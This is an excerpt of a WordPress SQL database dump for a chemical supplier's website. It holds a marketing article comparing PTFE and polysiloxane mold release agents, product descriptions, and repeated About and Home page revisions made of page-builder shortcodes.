INSERT INTO `wp_posts` VALUES (1561, 3, '2016-09-12 19:19:59', '2016-09-12 19:19:59', '', 'releasys-polysiloxane', '', 'inherit', 'open', 'closed', '', 'releasys-polysiloxane', '', '', '2016-09-12 19:19:59', '2016-09-12 19:19:59', '', 1525, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/ReleaSys-polysiloxane.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1562, 3, '2016-09-12 19:23:21', '2016-09-12 19:23:21', '<img class="alignnone wp-image-1554" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/mold-release-agent-miller-stephenson-800x534.jpg" alt="mold-release-agent-miller-stephenson" width="697" height="465" />\r\n\r\nMold release agents provides the critical barrier between a molding surface and the substrate enabling separation of the cured, finished part from the mold surface. Irregular applications and improper release agent choice will have a dramatic effect on the quality and consistency of your finished product.   It is therefore critical the process engineer is knowledgeable for which mold release agent compliments there production method.  There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.\r\n\r\n<strong>PTFE Release Agents</strong>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE-based release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability.  PTFE-release agents contain no silicones, surfactants, or waxes and are thermal stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining to the molding substrate.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be troublesome with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on an release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry to enhances releases per application.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding constant,efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cure films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating adhesion.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex mold or with abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based substrates.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 19:23:21', '2016-09-12 19:23:21', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1563, 3, '2016-09-12 19:47:44', '2016-09-12 19:47:44', '[row]\n\n[col span="6"]\n\n<p><strong>On The Cutting Edge of the Performance Chemical Market</strong></p>\n<p>Miller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.</p>\n\n[/col]\n[col span="5"]\n\n[ux_image id="1095" image_size="thumbnail"]\n\n\n[/col]\n[col]\n\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\n<p>Looking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.</p>\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4"]\n\n[ux_image id="1054"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="142"]\n\n\n[/col]\n[col span="4"]\n\n[ux_image id="87"]\n\n\n[/col]\n\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-09-12 19:47:44', '2016-09-12 19:47:44', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1564, 3, '2016-09-12 19:49:57', '2016-09-12 19:49:57', '[row]\r\n\r\n[col span="6"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n[col span="5"]\r\n\r\n[ux_image id="1095" image_size="thumbnail"]\r\n\r\n[/col]\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-09-12 19:49:57', '2016-09-12 19:49:57', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1567, 1, '2016-09-12 21:48:27', '2016-09-12 21:48:27', '', 'EPIKURE™ 3223', 'EPIKURE™ Curing Agent 3233 is an unmodified, T403-type polyoxypropylenetriamine that has moderate reactivity, low viscosity, low color, low vapor pressure and high primary amine content. It resists “blush”, “bloom” and “sweat-out” in epoxy compositions. EPIKURE Curing Agent 3233 is a trifunctional primary amine curing agent with the idealized chemical structure shown below. Benefits include:\r\n<ul font-style:inherit>\r\n 	<li>low viscosity and low vapor pressure</li>\r\n 	<li>light color and improved color retention compared to conventional amine-cured epoxy systems</li>\r\n 	<li>long pot life</li>\r\n 	<li>improved flexibility and good impact resistance</li>\r\n</ul>', 'inherit', 'closed', 'closed', '', '1183-autosave-v1', '', '', '2016-09-12 21:48:27', '2016-09-12 21:48:27', '', 1183, 'https://132.148.10.86/wordpress/1183-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1568, 1, '2016-09-12 22:24:12', '2016-09-12 22:24:12', '', 'MS-122AV', 'MS-122AV combines high-efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry.  This formulation yields superior adhesion of PTFE to metallic, glass, and non-plastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer.   MS-122AV advantages include:\n<ul style=">\n 	<li>Unparalleled release agent durability</li>\n 	<li>Ideal for difficult mold geometries</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>', 'inherit', 'closed', 'closed', '', '182-autosave-v1', '', '', '2016-09-12 22:24:12', '2016-09-12 22:24:12', '', 182, 'https://132.148.10.86/wordpress/182-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1571, 1, '2016-09-13 00:29:36', '2016-09-13 00:29:36', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<p><H3></p>\n<p><em>Quality &amp; Service</em></p>\n</h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="large" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="large" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 00:29:36', '2016-09-13 00:29:36', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1572, 1, '2016-09-13 00:31:12', '2016-09-13 00:31:12', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<p><H3></p>\n<p><em>Quality &amp; Service</em></p>\n</h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 00:31:12', '2016-09-13 00:31:12', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1574, 1, '2016-09-13 01:41:11', '2016-09-13 01:41:11', '', 'krytoxgrey', '', 'inherit', 'open', 'closed', '', 'krytoxgrey', '', '', '2016-09-13 01:41:11', '2016-09-13 01:41:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/krytoxgrey.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1575, 1, '2016-09-13 01:44:04', '2016-09-13 01:44:04', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<h2>SINCE 1955</h2>\r\n\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<p><H3></p>\r\n<p><em>Quality &amp; Service</em></p>\r\n</h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n[divider]\r\n\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1259" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1574"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1261"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1257"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 01:44:04', '2016-09-13 01:44:04', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1576, 1, '2016-09-13 02:01:16', '2016-09-13 02:01:16', '', 'hexion_grey', '', 'inherit', 'open', 'closed', '', 'hexion_grey', '', '', '2016-09-13 02:01:16', '2016-09-13 02:01:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/hexion_grey.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1577, 1, '2016-09-13 02:02:20', '2016-09-13 02:02:20', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<h2>SINCE 1955</h2>\r\n\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<p><H3></p>\r\n<p><em>Quality &amp; Service</em></p>\r\n</h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap 